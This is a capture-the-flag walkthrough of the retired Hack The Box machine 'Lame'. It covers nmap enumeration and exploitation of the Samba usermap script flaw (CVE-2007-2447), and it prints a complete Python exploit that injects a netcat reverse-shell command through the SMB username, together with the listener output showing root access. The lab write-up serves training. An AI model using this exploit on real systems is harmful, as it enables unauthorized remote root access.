HTB – Lame

Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Lame lab.

Level: Beginner

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sV 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 20:00 W. Europe Standard Time
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds
root@kali:/pwk# nmap --script smb-os-discovery.nse -p445 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 07:57 EDT
Nmap scan report for 10.10.10.3
Host is up (0.033s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-os-discovery: 
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name: 
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-17T04:59:42-04:00

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

From nmap results we saw samba service smbd 3.x is running in victim’s machine

CVE-2007-2447 – Samba usermap script.

https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Usage:

$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
  • RHOST — The target address
  • RPORT — The target port (TCP : 139)
  • LHOST — The listen address
  • LPORT — The listen port

Installation

sudo apt install python python-pip
pip install --user pysmb
git clone https://github.com/amriunix/CVE-2007-2447.git
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
└──╼ $python usermap_script.py 10.10.10.3 445 10.10.14.10 9001
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
┌─[puck@parrot-lt]─[~/htb/lame/CVE-2007-2447]
root@kali:~/htb/lame# cat usermap.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print '[+] Payload was sent - check netcat !'

if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

Done. You should receive the connection to your listener:

root@kali:~/htb/lame# nc -lvp 443
listening on [any] 443 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.3] 52321
whoami
root

Inside path: /home/makis I found user.txt file

Inside path: /root I found root.txt file

Author: Jacco Straathof

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *